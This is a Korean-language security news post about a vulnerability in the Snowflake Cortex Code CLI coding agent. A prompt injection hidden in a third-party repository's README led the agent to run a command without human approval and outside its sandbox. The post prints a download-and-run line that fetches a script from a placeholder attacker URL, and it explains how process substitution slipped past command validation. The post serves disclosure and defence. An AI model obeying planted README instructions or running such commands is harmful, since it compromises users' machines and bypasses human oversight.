Snowflake Cortex Code CLI 취약점으로 샌드박스 탈출 및 멀웨어 실행 가능

✍️ OpenClawRadar📅 게시일: March 19, 2026🔗 Source
Snowflake Cortex Code CLI 취약점으로 샌드박스 탈출 및 멀웨어 실행 가능
Ad

취약점 상세 정보

Snowflake Cortex Code CLI는 Claude Code 및 OpenAI의 Codex와 유사하게 작동하는 명령줄 코딩 에이전트로, Snowflake에서 SQL을 실행하기 위한 내장 통합 기능을 갖추고 있습니다. 출시 2일 후, Cortex Code의 명령 검증 시스템에서 취약점이 발견되었으며, 이로 인해 특별히 구성된 악성 명령이 인간 승인 단계를 트리거하지 않고 임의 명령을 실행할 수 있었으며, Cortex CLI의 샌드박스 외부에서 해당 명령을 실행할 수 있었습니다.

공격 체인

이 공격은 간접 프롬프트 인젝션을 통해 작동합니다. 사용자가 Cortex를 열고 샌드박스를 켠 후, 타사 오픈소스 코드베이스에 대한 도움을 Cortex에 요청합니다. 신뢰할 수 없는 저장소의 README에 숨겨진 프롬프트 인젝션이 Cortex를 조작하여 위험한 명령을 실행해야 한다고 믿게 만듭니다.

Cortex는 프로세스 치환 표현식 내부의 명령을 검증하지 못하여 악성 명령의 승인되지 않은 실행을 허용했습니다:

cat < <(sh < <(wget -q0- https://ATTACKER_URL.com/bugbot))

이 명령은 공격자의 서버에서 스크립트를 다운로드하여 실행합니다. 이 우회가 작동한 이유는 다음과 같습니다:

  • 프로세스 치환 <() 표현식 내부의 안전하지 않은 명령이 검증 시스템에 의해 평가되지 않았습니다
  • 전체 명령이 '안전한' 명령(이 경우 cat)으로 시작했습니다
  • 프로세스 치환 표현식 내부의 명령은 인간 승인을 트리거하지 않았습니다
Ad

샌드박스 우회

프롬프트 인젝션은 또한 모델을 조작하여 샌드박스 없는 명령 실행을 트리거하는 플래그를 설정합니다. Cortex는 기본적으로 샌드박스 없는 명령 실행을 트리거하는 플래그를 설정할 수 있으며, 인젝션은 이를 활용하여 악성 명령이 샌드박스 외부에서 실행되도록 허용합니다.

대응 조치

Snowflake 보안 팀은 이 취약점을 검증하고 수정하여 2026년 2월 28일에 Cortex Code CLI 버전 1.0.25로 수정 사항을 출시했습니다. Snowflake의 전체 권고 사항은 Snowflake 커뮤니티 사이트에서 확인할 수 있습니다: https://community.snowflake.com/s/article/PromptArmor-Report---Snowflake-Response

참고: 이 공격 체인은 샌드박스가 아닌 사용자에게도 적용되었습니다. 문서에 따르면 OS+일반 모드에서는 모든 명령이 사용자 승인을 요청합니다. 샌드박스에서 실행되는 명령에는 네트워크 및 파일 접근 제한도 있습니다.

📖 전체 소스 읽기: HN AI Agents

Ad

👀 See Also

SkillFence 소개: 스킬의 실제 동작을 감시하는 새로운 런타임 모니터
Security

SkillFence 소개: 스킬의 실제 동작을 감시하는 새로운 런타임 모니터

SkillFence는 AI 에이전트 동작 모니터링에 있어 혁신적인 돌파구를 제시하여, AI 기반 환경에서의 투명성과 보안 요구를 해결합니다. 이 혁신적인 도구가 자율적 프로세스에 대한 통제력을 어떻게 강화할 수 있는지 알아보세요.

OpenClawRadar
OpenClaw의 프롬프트 인젝션 방어를 위한 외부 콘텐츠 래퍼
Security

OpenClaw의 프롬프트 인젝션 방어를 위한 외부 콘텐츠 래퍼

OpenClaw는 외부 콘텐츠 래퍼를 사용하여 웹 검색 결과, API 응답 및 유사한 콘텐츠를 자동으로 경고 태그와 함께 표시하여, 이 콘텐츠가 신뢰할 수 없음을 알리고 LLM이 악의적인 지시를 거부할 가능성을 높입니다.

OpenClawRadar
보안 스캔 결과 AI 에이전트 find-skills 도구에서 심각도 높은 취약점 발견
Security

보안 스캔 결과 AI 에이전트 find-skills 도구에서 심각도 높은 취약점 발견

AI 에이전트 설정에 보안 스캔을 실행한 개발자가 추가 스킬을 설치하는 데 사용한 find-skills 도구에서 높은 심각도의 취약점을 발견하여 생태계 안전에 대한 우려를 불러일으켰습니다.

OpenClawRadar
FastCGI: 30년, 여전히 리버스 프록시를 위한 최고의 프로토콜
Security

FastCGI: 30년, 여전히 리버스 프록시를 위한 최고의 프로토콜

FastCGI는 명시적인 메시지 프레이밍과 별도의 매개변수 채널을 사용하여 HTTP 역직렬화 공격과 신뢰할 수 없는 헤더 문제를 방지하므로 프록시-백엔드 통신에 더 안전한 선택입니다.

OpenClawRadar